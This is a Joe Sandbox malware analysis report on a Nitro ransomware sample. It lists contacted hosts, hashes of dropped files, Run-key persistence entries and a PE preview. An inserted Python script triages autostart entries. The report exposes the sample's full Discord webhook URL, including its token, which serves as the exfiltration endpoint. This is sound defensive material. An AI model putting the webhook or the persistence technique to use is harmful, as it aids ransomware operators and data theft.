http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD | 0% | Avira URL Cloud | safe
https://canary.discord.com4zkd | 0% | Avira URL Cloud | safe
https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 | 0% | Avira URL Cloud | safe
https://canary.discord.com | 0% | Avira URL Cloud | safe
http://canary.discord.com | 0% | Avira URL Cloud | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org.herokudns.com | 54.91.59.199 | true | false | | unknown
canary.discord.com | 162.159.138.232 | true | false | | unknown
api.ipify.org | unknown | unknown | false | | high
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 | false | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD | 12057ad2.exe, 12057ad2.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://canary.discord.com | 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://canary.discord.com4zkd | 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v8/entitlements/gift-codes/ | 12057ad2.exe, 12057ad2.exe.0.dr | false | URL Reputation: safe | unknown
http://canary.discord.com | 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | 12057ad2.exe, 12057ad2.exe.0.dr | false | | high
http://fontfabrik.com | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://i.ibb.co/0frTD92/discord-avatar-512.png | 12057ad2.exe, 12057ad2.exe.0.dr | false | | high
http://www.fontbureau.com/designers8 | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 12057ad2.exe, 00000000.00000002.574630053.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
54.91.59.199 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AES | false
162.159.136.232 | unknown | United States | 13335 | CLOUDFLARENET | false
162.159.137.232 | unknown | United States | 13335 | CLOUDFLARENET | false
162.159.138.232 | canary.discord.com | United States | 13335 | CLOUDFLARENET | false
                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                              Analysis ID:709270
                                              Start date and time:2022-09-25 06:45:27 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:12057ad2.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.rans.troj.winEXE@8/56@7/4
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 109
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                              • Execution Graph export aborted for target 12057ad2.exe, PID 4920 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:46:25 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
06:46:26 | API Interceptor | 26x Sleep call for process: 12057ad2.exe modified
06:46:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NR "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
06:46:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NR "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
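The two Autostart rows above record the sample registering a Run value named NR that points at a copy of itself under the user's Temp directory, not at the Desktop path it was launched from. The following is an added example, not Joe Sandbox's or the malware author's code: it parses rows in the shape of the timeline table above and flags Run entries whose image sits in a user-writable staging directory or is a relocated copy of the analysed sample. The row strings, the launch path and the staging-directory list are constructed from this report; the regular expression and the two heuristics are the example's own.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Rows constructed from the "Time | Type | Description" table above, not a report export.
TIMELINE_ROWS = [
    "06:46:25 | API Interceptor | 1x Sleep call for process: WMIC.exe modified",
    "06:46:26 | API Interceptor | 26x Sleep call for process: 12057ad2.exe modified",
    '06:46:27 | Autostart | Run: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run NR "C:\\Users\\user\\AppData\\Local\\Temp\\12057ad2.exe"',
    '06:46:41 | Autostart | Run: HKCU64\\Software\\Microsoft\\Windows\\CurrentVersion\\Run NR "C:\\Users\\user\\AppData\\Local\\Temp\\12057ad2.exe"',
]

# Where the sample was launched from in this analysis (process tree at the top of the report).
LAUNCHED_FROM = "C:\\Users\\user\\Desktop\\12057ad2.exe"

# User-writable locations a Run value should rarely point into. This list is the
# example's own heuristic, not a Joe Sandbox classification.
STAGING_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\users\\public\\",
    "\\programdata\\",
    "\\windows\\temp\\",
)

# Matches the "Run: <hive>\<key> <value name> <command>" description shape used above.
RUN_RE = re.compile(
    r"^Run:\s+(?P<hive>HK(?:CU|LM|U)(?:64)?)\\"
    r"(?P<key>Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?)\s+"
    r"(?P<value>\S+)\s+(?P<command>.+?)\s*$"
)


@dataclass
class RunEntry:
    time: str
    hive: str
    key: str
    value_name: str
    image: str                      # executable path with surrounding quotes stripped
    reasons: List[str] = field(default_factory=list)


def image_from_command(command: str) -> str:
    """Return the executable part of a Run value's command line (quoted or first token)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0]


def parse_run_entry(row: str, launched_from: Optional[str] = None) -> Optional[RunEntry]:
    """Parse one timeline row; return a RunEntry for Autostart/Run rows, else None."""
    parts = [p.strip() for p in row.split("|", 2)]
    if len(parts) != 3 or parts[1] != "Autostart":
        return None
    m = RUN_RE.match(parts[2])
    if not m:
        return None
    image = image_from_command(m.group("command"))
    entry = RunEntry(parts[0], m.group("hive"), m.group("key"), m.group("value"), image)
    low = image.lower()
    if any(d in low for d in STAGING_DIRS):
        entry.reasons.append("image lives in a user-writable staging directory")
    if launched_from is not None:
        same_name = ntpath.basename(launched_from).lower() == ntpath.basename(image).lower()
        if same_name and launched_from.lower() != low:
            entry.reasons.append("sample persisted a copy of itself outside its launch directory")
    return entry


def triage(rows: List[str], launched_from: Optional[str] = None) -> List[RunEntry]:
    """Return the Run-key entries that tripped at least one heuristic, in row order."""
    hits = []
    for row in rows:
        entry = parse_run_entry(row, launched_from)
        if entry is not None and entry.reasons:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in triage(TIMELINE_ROWS, LAUNCHED_FROM):
        print(f"{hit.time} {hit.hive}\\{hit.key}\\{hit.value_name} -> {hit.image}")
        for reason in hit.reasons:
            print(f"    - {reason}")
```

The HKCU and HKCU64 rows are the same logical key seen through the 32-bit and 64-bit registry views, which is why both trip the same two heuristics; on a live host the same check would run over the values read from HKCU\Software\Microsoft\Windows\CurrentVersion\Run.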
Match: 54.91.59.199
Associated Sample Name / URL | Detection | Context
ConsoleApp8.exe | malicious | api.ipify.org/
if.bin.dll | malicious | api.ipify.org/
D1768Y2157.doc | malicious | api.ipify.org/
gSbSxwWtqG.exe | malicious | api.ipify.org/?format=xml
gPZ7cR9v89.exe | malicious | api.ipify.org/?format=xml
mixshop_20211229-065147.exe | malicious | api.ipify.org/?format=xml
iff.bin.dll | malicious | api.ipify.org/
SecuriteInfo.com.Heur.31820.doc | malicious | api.ipify.org/
229C7DF4.doc | malicious | api.ipify.org/
0617_1876522156924.doc | malicious | api.ipify.org/
Whrw7Kmlni.exe | malicious | api.ipify.org/?format=xml
gelfor.dll | malicious | api.ipify.org/
invoice_860500.doc | malicious | api.ipify.org/
httpd | malicious | api.ipify.org/
1103_788528522604.doc | malicious | api.ipify.org/
Match: api.ipify.org.herokudns.com
Associated Sample Name / URL | Detection | Context
d6214420.exe | malicious | 3.220.57.224
dq87MTBgkh.exe | malicious | 3.232.242.170
339c95f3.exe | malicious | 54.91.59.199
38134969.exe | malicious | 54.91.59.199
3ac5d389.exe | malicious | 54.91.59.199
d3b93beb.exe | malicious | 54.91.59.199
e1d7308b.exe | malicious | 3.220.57.224
34c67848.exe | malicious | 54.91.59.199
e6909597.exe | malicious | 54.91.59.199
mOVI5k0Lkx.exe | malicious | 54.91.59.199
23734741880309926121.htm | malicious | 3.232.242.170
sf82hcVPNc.exe | malicious | 52.20.78.240
91ebe59cde57d7f4b32203db128abccf46fcbb02da1b072edf3d21601c9a5556.exe | malicious | 54.91.59.199
d616314c.exe | malicious | 3.232.242.170
invoice.exe | malicious | 3.232.242.170
https://s1663143059921.lassmich.com/track/click/v2-83956858 | malicious | 3.232.242.170
IMG0001909022.vbs | malicious | 3.220.57.224
Invoice-128836.html | malicious | 54.91.59.199
50bddde5.exe | malicious | 52.20.78.240
SHOXZOKHMb.exe | malicious | 52.20.78.240
Match: AMAZON-AESUS
Associated Sample Name / URL | Detection | Context
400dcab6.exe | malicious | 3.220.57.224
b222b83f.exe | malicious | 3.232.242.170
d6214420.exe | malicious | 3.220.57.224
dq87MTBgkh.exe | malicious | 3.232.242.170
339c95f3.exe | malicious | 54.91.59.199
38134969.exe | malicious | 54.91.59.199
3ac5d389.exe | malicious | 54.91.59.199
d3b93beb.exe | malicious | 54.91.59.199
e1d7308b.exe | malicious | 3.220.57.224
34c67848.exe | malicious | 54.91.59.199
e6909597.exe | malicious | 54.91.59.199
o8xGwc7aHa.elf | malicious | 52.206.106.76
pBI3IgjCsT.elf | malicious | 54.29.218.138
mOVI5k0Lkx.exe | malicious | 54.91.59.199
MKSQ30QqoA.elf | malicious | 50.19.246.19
KREZopxwSW.elf | malicious | 98.142.178.21
qoOjaTj6og.elf | malicious | 54.137.165.100
https://securedfaxdocumented.taplink.ws/ | malicious | 18.205.45.130
boat.x86.elf | malicious | 54.46.158.195
boat.arm6.elf | malicious | 52.20.130.115
Match: 3b5074b1b5d032e5620f69f9f700ff0e (JA3 client fingerprint)
Associated Sample Name / URL | Detection | Context
400dcab6.exe | malicious | 162.159.138.232, 54.91.59.199
b222b83f.exe | malicious | 162.159.138.232, 54.91.59.199
d6214420.exe | malicious | 162.159.138.232, 54.91.59.199
dq87MTBgkh.exe | malicious | 162.159.138.232, 54.91.59.199
339c95f3.exe | malicious | 162.159.138.232, 54.91.59.199
38134969.exe | malicious | 162.159.138.232, 54.91.59.199
3ac5d389.exe | malicious | 162.159.138.232, 54.91.59.199
d3b93beb.exe | malicious | 162.159.138.232, 54.91.59.199
e1d7308b.exe | malicious | 162.159.138.232, 54.91.59.199
34c67848.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
e6909597.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
file.exe | malicious | 162.159.138.232, 54.91.59.199
                                              No context
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):62976
                                              Entropy (8bit):5.358315076253311
                                              Encrypted:false
                                              SSDEEP:768:sKsMqCXfVcWOWM9ZkiANIUcmsYLDwUzc80gmq3oP/oDj:sKsebM9ZkiAPcYr/0O8/on
                                              MD5:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              SHA1:C172A657FD1A8759BECCFF5B144F1CB20033008A
                                              SHA-256:9E801CE8AF98B3C03423F3F9B3D9B2F36AAD15A63F21523210A9517F12057AD2
                                              SHA-512:0C9DB0F2CB081E4D44095BE6D71C2AA9967B45AF9BA6676CCF8775B918C53C4BBD291315F3970EE71428CEA0BC694F2B5F87FD6BA883BC401767FB094354DB7D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: MALWARE_Win_Nitro, Description: Detects Nitro Ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: ditekSHen
                                              • Rule: RAN_Nitro_Aug_2021_1, Description: Detect Nitro ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: Arkbird_SOLG
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 92%
• Antivirus: Metadefender, Detection: 54%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{"..........."...0.................. ... ....@.. .......................`............`.................................i...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........J...B..............}...........................................0..............(.......+L......~....o.........,0.~....r...p.(....o.....~.....o......~....(.........X....i2...(.........+...........(.........X.......i2.......~......o....o........*....................0..............(.......+P......(......,<.~....r...p.(....o.........o....~....o....Yo....~....(.........X....i2...(.........+...........(.........X.......i2.......~......o....o........*....................0..
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32
                                              Entropy (8bit):4.875
                                              Encrypted:false
                                              SSDEEP:3:1xIBgHP5iqW:1IghiqW
                                              MD5:0F541F69672FCA17934DFB69428F9D97
                                              SHA1:6712AE28708BA21513E167D50AFF20EBF3CD59FF
                                              SHA-256:A4DE0D503FE442AB2762C6C8EC6C90B7DEB1E12ED79145D0DCCD42D474AFDFE2
                                              SHA-512:B13995E95B561376A6548ACB6C06912F09CE2C4D6FCF42AFFA53E752DD2D3D1B7CC3A001CA7EE19FAC04A490FE8F9817847ECF78C9F3349DC33FB8EF81DC295B
                                              Malicious:true
                                              Preview:d8..Ll.7.o.....y.v..~O.M.o\.py>s
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.790235914976103
                                              Encrypted:false
                                              SSDEEP:24:+Q8lbIAho9hYICRbVcdEmvsAT1PTR4wKaGM5sYEDBSgqFG:3ubIAho9hYDZCVx1rRtKjYcSy
                                              MD5:A119010A7740C9DA0B5A64CE4204532E
                                              SHA1:5CD8FEF001E7C432D9E46B05204B3D816C3A251F
                                              SHA-256:863A508886BA9C24BD75892CAAD0B9B17C40790D3CB35BDC5982DF816A7A21D6
                                              SHA-512:0D586AF4305F194D29DCCF005BBE0ECACCABCE0A90B1E92502E4EAE3835E62EEC38E86532D76BD222BDB610CD261B867BD03EA828762560A76A7ED86ABEB93FB
                                              Malicious:false
                                              Preview:$...E..U.p7z8.u...ftV.../.g....)..w.....a.....D$fc.I.L...q$F.....T.G........S..6.iz3...a.+.' .?.}}.ip?..N.p."Z...^l....j e...sK.....F....................7B.E.t..K.\h.....(.Y..0..........R..3[.E.3...5...;Y....a.......I....D..t.>8...u{,.._...u.n.(.r..dGz5...sP....z..t......b..*(..h../...2.....e.t.#_.$....@9.hqM.......#.........K...BS<NZa..!..I.Z..*..PI.I.q.<t?.........-.UiB..h.X... ....1.N5t5%...LK.].)..3.~.H...u.....9..R.92`Bt[Aq.P...p...[...-.0.+V......+.]._Q....\.O.9....2?T......3H.V......TVB.6[....S.7D.p.`.}zN..V0.7.)%.s..>....\.hh.X]$X.!......4..W.0a#w...E....<m.$..._.Q|}..;..WL.j..v...%T.o..W..<.y..s=...l/E.....j.0....W..5>.U.[.....p..:.<W-.4q.......h..jE.3..:&.....hzz..k.(...g.g....f..|D?..h..D[.*. >:B.Rn....{`..b<A_'......z....!....,..@./.....E.)..G.N.. x.H.]j.../8..U..7....o.}....E.BA..s.[b.o%B...4~.T..9i.a.q...%.]..Lr4.g.......~.E.V.]H...^..^...K....@"..........@.@...{i].A1ki...(.I......`rl....Ee.p...Pn.....gt.,........[.
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.821187460166646
                                              Encrypted:false
                                              SSDEEP:24:rZlPY++gPn0/2pkk2VneFpve/x+h7Hqic312Lcu2aUltYTf:llPY4kzneFpvmx+h7Hop/K
                                              MD5:1FFE96D70973EA4BA9E6657B6DBB14C6
                                              SHA1:60AE009DF5E066A9A37EF539416F6FA09BE36756
                                              SHA-256:951247191BE78661613D5A798F8E5997A2335E459A1F96B93626EDB89E929A8F
                                              SHA-512:49204FF982F6E4C5BFCAF3CCB4ED886E8BDD44458B155F5AAA7A487250738EDF827CB353916337BF49A41354F9A78818991484FF675437B9BBB1D2546A1012BA
                                              Malicious:false
                                              Preview:.Y%..8".5..Z...7PTaX...rj......s=EZ.,..P}.O...3I...%lEl......w..v......RD..g=..QB.q..d\..R.z..~......c....r.U7.(.B..w.u..SHgn(._.`........!5OB..?R....\......=)E~....xuW.7..|n.....k..T....,z..b.>.u..*.p.b.s9.<...?1..|...`...I0J..Y..$H....D.}.W..d%..@.^(U....S....... .^DN?(.....ZxF.......".hB}..V...w..+;..P.av..m..Z....kD,_._...^.*..=...?.d}.UP$o...<a?l7#_.......A7*.......Y....%..H..l.v..#.K...l.@z\B....L.7g..D/(...R=.....!....R......a@..R.z...:]L.w..\.U8."...0...n0.^CgH.A.a..3.|!..He2|..L.R}*....f.(2......8...w-{....D.>..F.....(&(X*$uyjuQ.*..#V.>6..8.......i....`8)qA.m.4]..n....*......,.+5.(.*o<f^.@&.....{A`x..V3..M(..>.:..5.......wx._...d.p...2n1.B.K#%...~').c.........L.iI/....]..nEB.c......>.w.\...>.E........UR.0.BD=...[D...g....a].+...N!...=..#a.*.{..~.n.@]..\.;Q4x\.*..XzxA.%.D.c.%`iA..co..V U..:....a*.....^.....I...W[8....A..o.......y..M.....G......P..>....w...S&KPTRx..P2O(...tB.w..b. ...\...a0q.PIS.M.2S.&.....}`.&.^....+.).=.p
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.788941520372811
                                              Encrypted:false
                                              SSDEEP:24:VfFk0i0CTaakxkCAAGEVOv5Inm9tzWYN1e:VfO0i0C1qkCAzEQvRSE1e
                                              MD5:5917969078BE8E3FC71C10E241B413BA
                                              SHA1:3E8B046E6104E4984609ED5756D0074129E3AB1A
                                              SHA-256:DA9CB73CDD05447AAD54C1DD4F32BDFB40B4D564020B487C8EDA0850CA212C0B
                                              SHA-512:D8278AA56E5A142BBAE2073C2D34F6801A0285553DFE849B9D0A1CDE414DEBA23D35034656A5D0CA0EBF3861FED2DBC76656B7E4CCE62EFC84233BCD6B2C751B
                                              Malicious:false
                                              Preview:..{...t..C{..s>..x..t..y.J...>rd...x4...E.Bv.x6Q...n.f.b......g.D.8`#.g6(w./....'..`.m.P..C.m....E..o.\.}.n...fT....w.>...MA..X.a.F.B...e......-%uS....%%.3k.!........}........vn.Z..M...Z.....}..2+l..G.c12.6.Dg.z"^:...4.J...(R....\.....EY^.....5e..g...../.^l......xP..#0.RW..H=.,a*..#Z/e\.;j.|.....[...}.Q..C.YGT.R.M...r....g...>....K3}..u.Yo.Q.g.J|.I.(P..$.Y.YML..g._^8..9y...G......M...5.s..d.`.....L>s.RPG ..h..\i...@.$Q.l.L.\.^..4.7..oT...........N...@.!N.......IZ{o..t.o.....hN....G!..NF.[.D.N.G.`.l....s...NO...NM;.O#T.......83.)]...Wv.8......DB........#>..p.!.X..n....s..T..v@{=~.-.......h7=+..Mk.#.%.0..........:...wm.`cFs+>.?b..F..a..3 .?..G.B(W....OK.....&H..`..~....E......~8+$.4\.sD...|{6...........bb...T.<..)......~..{... %...&.yO.W[..>........}z....vLN......-..[.>.|p*.mER._.B....M.P.RP...x./2.....3G...Z.............74.P._..0.9...o9....#..r..Do{..N...#26....N...GvJ...I.5...........u%'..w..R...{?...|<..T#.-._.8...K.. .......w..B?...%.
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8168197959956
                                              Encrypted:false
                                              SSDEEP:24:gDjxYcOmx/LTgY1/B75jBU1+MGrhd/8rqiqX7gxrggYd91zHW0AdF:gHxEm/LT975jyqhd/Z7gxrOJHW0sF
                                              MD5:45151148B03705537F52B9AE72DF37DB
                                              SHA1:261F99A24E54C8952C5CB4C0F662DF972CB726DF
                                              SHA-256:54D6A3AA57FAB37823267803282000E3D5884A7367ADE20A241F1EEE926C96B3
                                              SHA-512:5EBA58F72C82AE9149E23AFDBFA2FEE450F449BED6EBD42908DE3B0C8B226772004867709086306863468730D3F09A2E82FCCD87B012959FE181D8619B865BD3
                                              Malicious:false
                                              Preview:..pe~.7.J..5...Q.TDt...1Q.%..l..6i..q...o......^0..>\.c...%...d.C.j...4..8.7....Q.,.9.|1...kt...Y8.%....'......Q..PnY._j.8z.*t..c..`N.M.`....q.'0I....U.C}oe3>`....-.&.Z.P|....[...`....}8I...q..mL...>..........&....'E.....x.4.2..K....`.....kP.5.:..l.5.j..05(...Rq.[....t.....G.E."Nye..M..fT.H....F..z..){...l.s..g....:.y."..a....%.....i.=[s.[.).{.a...e..p.`.wg.o..5t,..$...$.........(#0W.9.....&..^z....7l..\D.@..St..!.~.U..P~....0.J1.x.......L*.L=....}."00.....0.].w.q.B\....NPo5F5|.0Y..c..:....w.\......F..wI..Xat.ph.<.a;...mlK...Ts.'7../6+P......l..(.W.?iS!..qj............~.5.X>....?/.\...8...p.s>....E...]..b.T.b...J.Q....9.@-x..3..v...x....iY..=..|...V..Z.............h....&-.*)*....t..$.....n.p$;..o..#h.y..Q..,.....n.z...t...^h.q.7...s.Q^.K..l.....x.8.O8.........Jt......MW....[fT.%_..o.UsZ..F"4.I.....GL'.x..N.....H....@R.Ij.s.%.P..?......;}.*z......#..>&T.".].4.[..i.}N..7.2.F....../..iIx(h...H.....e$(.D.Ns..5/.)....?gO0a...m..|.YK...
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.834001176405737
                                              Encrypted:false
                                              SSDEEP:24:IRuX6JZI2HAIZDVcGtm+QgMr/0xAwYuIoptoxBgpIlgfDL5VEu7mDb8:zqJZjAIZZcGggMmAwYuIEiE7fEPb8
                                              MD5:A29551BD36DE23E65C2D8A7F172FFA05
                                              SHA1:FC0AEA9607A00188122A4A4298163238F164C83C
                                              SHA-256:AFE0E8B3F534A80B511C2027C663EC6BCB16146EC230D1E127A6D8842F0E14AB
                                              SHA-512:E82F58CCEBAAF561073E2DD0196D73DA8954B9A091ABB9AAFABD999E11933CB5077051271790DD262245FD95D0F3AC031C7CE241048F0F52B27B00979157B5A9
                                              Malicious:false
